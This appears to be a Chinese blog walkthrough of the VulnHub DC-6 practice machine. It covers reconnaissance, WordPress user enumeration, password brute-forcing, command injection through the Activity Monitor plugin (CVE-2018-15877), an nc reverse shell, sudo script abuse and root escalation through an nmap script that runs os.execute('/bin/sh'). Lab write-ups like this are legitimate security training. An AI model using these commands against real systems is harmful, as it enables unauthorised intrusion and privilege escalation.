首页 > 其他分享 >DC-6

DC-6

时间:2024-08-20 15:48:11浏览次数:11  
标签:15 14 23 nmap DC 403 wp

靶机介绍

  靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip

环境搭建

  下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版

  kali攻击机:192.168.98.136

靶机渗透

信息收集

扫描主机

arp-scan -l

image

  靶机ip地址为:192.168.98.144

扫描端口

masscan --rate=100000 -p 0-65535 192.168.98.144

image

  80、22端口开放

image

  22端口是ssh服务,80端口开放了一个网站

  访问192.168.98.144发现访问不了,这里需要改下本地的dns

# linux:
vim /etc/hosts
# windows:
C:\Windows\System32\drivers\etc\hosts

image

  爆破一下ssh(爆破未成功)

nmap --script=ssh-brute 192.168.98.144

  ‍

  ‍

  指纹识别​imageWordPress 5.1.1

目录扫描

dirsearch -u http://192.168.98.144 -i 200,300-399,403

image

image

[15:14:23] 403 -  300B  - /.ht_wsr.txt
[15:14:23] 403 -  303B  - /.htaccess.bak1
[15:14:23] 403 -  303B  - /.htaccess.orig
[15:14:23] 403 -  303B  - /.htaccess.save
[15:14:23] 403 -  305B  - /.htaccess.sample
[15:14:23] 403 -  304B  - /.htaccess_extra
[15:14:23] 403 -  303B  - /.htaccess_orig
[15:14:23] 403 -  301B  - /.htaccess_sc
[15:14:23] 403 -  301B  - /.htaccessOLD
[15:14:23] 403 -  302B  - /.htaccessOLD2
[15:14:23] 403 -  301B  - /.htaccessBAK
[15:14:23] 403 -  293B  - /.htm
[15:14:23] 403 -  294B  - /.html
[15:14:23] 403 -  303B  - /.htpasswd_test
[15:14:23] 403 -  299B  - /.htpasswds
[15:14:23] 403 -  300B  - /.httr-oauth
[15:14:25] 403 -  294B  - /.php3
[15:14:25] 403 -  293B  - /.php
[15:15:07] 200 -   18KB - /index.php
[15:15:08] 200 -    7KB - /license.txt
[15:15:23] 200 -    3KB - /readme.html
[15:15:26] 403 -  302B  - /server-status
[15:15:26] 403 -  303B  - /server-status/
[15:15:40] 301 -  319B  - /wp-admin  ->  http://192.168.98.144/wp-admin/
[15:15:40] 200 -    0B  - /wp-config.php
[15:15:40] 302 -    0B  - /wp-admin/  ->  http://wordy/wp-login.php?redirect_to=http%3A%2F%2F192.168.98.144%2Fwp-admin%2F&reauth=1
[15:15:40] 200 -  517B  - /wp-admin/install.php
[15:15:40] 200 -    0B  - /wp-content/
[15:15:40] 301 -  321B  - /wp-content  ->  http://192.168.98.144/wp-content/
[15:15:40] 403 -  327B  - /wp-content/plugins/akismet/akismet.php
[15:15:40] 403 -  325B  - /wp-content/plugins/akismet/admin.php
[15:15:40] 301 -  322B  - /wp-includes  ->  http://192.168.98.144/wp-includes/
[15:15:40] 200 -    4KB - /wp-includes/
[15:15:40] 200 -    0B  - /wp-cron.php
[15:15:41] 200 -    1KB - /wp-login.php
[15:15:41] 302 -    0B  - /wp-signup.php  ->  http://wordy/wp-login.php?action=register

漏洞挖掘

wps扫描用户名

wpscan --url http://wordy --enumerate u

  将用户名保存到 username.txt文件中

image

admin
graham
mark
sarah
jens

  然后有个提示,不看答案的话,几乎做不了这个题
提示地址:https://www.vulnhub.com/entry/dc-6,315/

image

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

  然后进行爆破

wpscan --url http://wordy/ -U username.txt -P password.txt

image

  爆破出来一个账户

Username: mark
Password: helpdesk01

  成功登录后台:http://wordy/wp-admin/

image

  ‍

Activity Monitor(CVE-2018-15877)远程命令执行

  在逛了一圈之后没发现可以写入shell的地方,注意这里有个插件:Activity monitor,这里存在远程命令执行漏洞!

image

  补充:

  • CVE-2018-15877漏洞是一个WordPress 插件Plainview Activity Monitor存在远程命令执行的漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。

  通过在正常命令后加 ‘| ls ’ 来执行我们想要的命令

image

image

  发现只能输入一半进去,应该是开发者限制了输入的字数

  打开F12,找到maxlength,修改为150 或者直接用bp抓包:

  靶机存在nc命令

image

  直接用nc反弹shell:

image

  kali成功监听:

image

ssh登录graham账户

  老规矩先去看看passwd和home目录下有什么敏感文件,在home/mark/stuff/things-to-do.txt​文件下发现了这句话

image

账号:graham
密码:GSo7isUM1D4

  尝试去登录:

image

  成功用ssh登录上账户graham ,但是当我去尝试登录后台时失败了

通过特定权限脚本切换账户

  尝试suid提取,发现没有可利用的

find / -perm -u=s -type f 2>/dev/null

  查看当前用户可执行操作

sudo -l                                  

image

  ​backups.sh​是一个解压的脚本

image

  向其中写入命令然后以 jens账户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

image

  成功切换到 jens 用户

nmap提权

  继续查看可执行命令:

sudo -l

image

  发现可以利用nmap命令提权

  nmap提权有2中方式:

  1. 要求:nmap有s标志位,nmap版本足够老
    nmap老版本支持“interactive.”选项,用户能够通过该选项执行shell命令

    sudo nmap --interactive 即可得到交互式shell
    然后在nmap交互模式下键入!bash,即可得到bash的root权限

    • !bash or !sh
    • whoami
  2.  TF=$(mktemp)
     echo 'os.execute("/bin/sh")' > $TF
     sudo nmap --script=$TF
    

  ‍

  第一种无法使用,版本不够老,直接使用第二种,拿到root权限:

image

  由于输入的内容没有显示出来,直接使用python开启一个标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

image

拿下flag

  寻找flag

find / -name *flag*

image

cat /root/theflag.txt

image

  ‍

总结

  1. 熟悉使用wps工具来枚举用户名和爆破密码
  2. Activity Monitor(CVE-2018-15877)远程命令执行漏洞利用
  3. 通过特定权限脚本切换账户
  4. nmap提权

  ‍

  ‍

标签:15,14,23,nmap,DC,403,wp
From: https://www.cnblogs.com/itchen-2002/p/18369576/dc6-zcuxc3

相关文章

  • Acrobat DC安装报错1603,Microsoft Visual C++2013(x64)失败
    之前顺利安装过AcrobatDC,但可能因为自动更新了,导致让我重新登录才能使用,无法再次破解。于是我卸载后重新安装,发现提示MicrosoftVisualC++2013(x64)运行安装失败。我也在网上找了教程,在Adobe官网上下载了MicrosoftVisualC++2013(x64)进行自安装,安装后也可以在设置——应......
  • AP9196 DC-DC 输入3-40V 6A升压恒流电源管理芯 太阳能路灯方案
    产品说明AP9196是一系列外围电路简洁的宽调光比升压调光恒流驱动器,适用于3-40V输入电压范围的LED照明领域。AP9196采用我司专利算法,可以实现高精度的恒流效果,输出电流恒流精度≤±3%,电压工作范围为5-40V,可以轻松满足锂电池及中低压的应用需求,输出耐压仅由MOS耐压决定。芯片内......
  • Winform(Devexpress)中实现GridView(GridControl)没有数据时,表格显示图片
    1.问题描述:在GridView中当数据源为空或者没有数据时,Grid表格下的画布显示图片;当然要使用到GridView事件:事件是:CustomDrawEmptyForeground代码如下:privatevoid_GridView_CustomDrawEmptyForeground(objectsender,CustomDrawEventArgse){if(_......
  • OpenID Connect(OIDC)认证--keycloak与springboot项目的整合
    OpenIDConnect认证–keycloak与springboot项目的整合文章目录OpenIDConnect认证--keycloak与springboot项目的整合前言什么是Keycloak?项目配置1.创建SpringBoot项目2.设置Keycloak服务器3.在Keycloak中创建Realm和Client4.配置SpringB......
  • Containerd高级命令行工具nerdctl安装及使用
      ################crictl####################crictl安装k8s即有,ctr是containerd的一个客户端工具,ctr-v输出的是containerd的版本[root@m1~]#crictl-vcrictlversionv1.30.1[root@m1~]#[root@m1~]#crictlimagesIMAGE......
  • 基于VSC的MVDC微电网(±10kV)转换器的互连通过等效RL电缆模块实现,此外,在电缆侧引入了
     ......
  • DC-2
    靶机介绍名称:DC-2发布日期:2019年3月22日难度:初级下载地址:https://download.vulnhub.com/dc/DC-2.zip环境搭建下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版‍kali攻击机:1......
  • DC-1
    环境搭建靶机下载地址:https://download.vulnhub.com/dc/DC-1.zip选择高版本的vmware,不然可能不支持ova导入下载导入开机vmware设置选择nat模式,目的让你的攻击机和靶机在一个网段,可以根据网络环境自行设置只要在一个网段就行。‍kali攻击机:192.168.98.136......
  • DC-3
    靶机介绍名称:DC:3.2发布日期:25Apr2020难度:初级下载地址:https://download.vulnhub.com/dc/DC-3-2.zip环境搭建下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版‍kali攻击机:192......
  • DC-4
    靶机介绍靶场下载地址:https://download.vulnhub.com/dc/DC-4.zip环境搭建下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版kali攻击机:192.168.98.136靶机渗透信息收集扫描主机​​可知靶机......